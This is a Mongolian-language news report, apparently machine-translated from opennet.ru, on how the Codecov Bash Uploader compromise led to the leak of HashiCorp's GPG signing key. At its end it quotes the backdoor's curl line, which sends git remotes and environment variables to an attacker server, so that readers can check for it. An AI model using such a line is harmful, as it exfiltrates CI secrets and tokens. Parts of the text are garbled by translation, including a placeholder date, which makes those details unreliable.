Vagrant, Packer, Nomad, Terraform зэрэг нээлттэй эхийн хэрэгслүүдийг хөгжүүлдгээрээ алдартай HashiCorp нь хувилбаруудыг баталгаажуулдаг дижитал гарын үсэг үүсгэхэд ашигладаг хувийн GPG түлхүүр алдагдсаныг зарлав. GPG түлхүүрт нэвтэрсэн халдагчид HashiCorp-ийн бүтээгдэхүүнийг зөв тоон гарын үсгээр баталгаажуулснаар далд өөрчлөлт хийх боломжтой. Үүний зэрэгцээ аудитын явцад ийм өөрчлөлт хийхийг оролдсон ул мөр илрээгүй гэж тус компани мэдэгдэв.
Одоогоор эвдэрсэн GPG түлхүүрийг хүчингүй болгож оронд нь шинэ түлхүүрийг нэвтрүүлсэн байна. Асуудал нь зөвхөн SHA256SUM болон SHA256SUM.sig файлуудыг ашиглан баталгаажуулалтад нөлөөлсөн бөгөөд releases.hashicorp.com-оор хангагдсан Linux DEB болон RPM багцуудад дижитал гарын үсэг үүсгэх, мөн macOS болон Windows (AuthentiCode)-д зориулсан баталгаажуулалтын механизмд нөлөөлөөгүй. .
Тасралтгүй интеграцийн системээс хамрах хүрээний тайланг татаж авахад зориулагдсан Codecov Bash Uploader (codecov-bash) скриптийг дэд бүтцэд ашигласны улмаас алдагдсан байна. Codecov компани руу халдлага хийх үед арын хаалга нь заасан скриптэд нуугдаж, нууц үг, шифрлэлтийн түлхүүрүүдийг халдагчдын сервер рүү илгээсэн байна.
Хакердахын тулд халдагчид Codecov Docker дүрсийг бүтээх явцад гарсан алдааны давуу талыг ашигласан бөгөөд энэ нь codecov.io сайтаас тараасан Bash Uploader скриптэд өөрчлөлт оруулахад шаардлагатай GCS (Google Cloud Storage) руу нэвтрэх өгөгдлийг задлах боломжийг олгосон юм. вэб сайт. Өөрчлөлтүүд 31-р сарын XNUMX-нд хийгдсэн бөгөөд хоёр сарын турш илрээгүй бөгөөд халдагчдад хэрэглэгчийн тасралтгүй нэгдсэн системийн орчинд хадгалагдсан мэдээллийг задлах боломжийг олгосон. Нэмсэн хортой кодыг ашигласнаар халдагчид туршиж үзсэн Git репозитор болон орчны бүх хувьсагчийн талаарх мэдээллийг авах боломжтой, тухайлбал Amazon Web Services, GitHub зэрэг програмын код, хадгалах газар, үйлчилгээнд хандах хандалтыг зохион байгуулахын тулд тасралтгүй интеграцийн системд дамждаг токенууд, шифрлэлтийн түлхүүрүүд, нууц үгүүд.
Шууд дуудлагаас гадна Codecov Bash Uploader скриптийг Codecov-action (Github), Codecov-circleci-orb, Codecov-bitrise-step зэрэг бусад байршуулагчийн нэг хэсэг болгон ашигласан бөгөөд хэрэглэгчид нь асуудалд өртөж байна. Codecov-bash болон холбогдох бүтээгдэхүүний бүх хэрэглэгчдэд дэд бүтцээ шалгахаас гадна нууц үг, шифрлэлтийн түлхүүрээ өөрчлөхийг зөвлөж байна. Та скрипт дотор арын хаалга байгаа эсэхийг curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” мөр байгаа эсэхийг шалгаж болно http:// /байршуулах/v2 || үнэн
Эх сурвалж: opennet.ru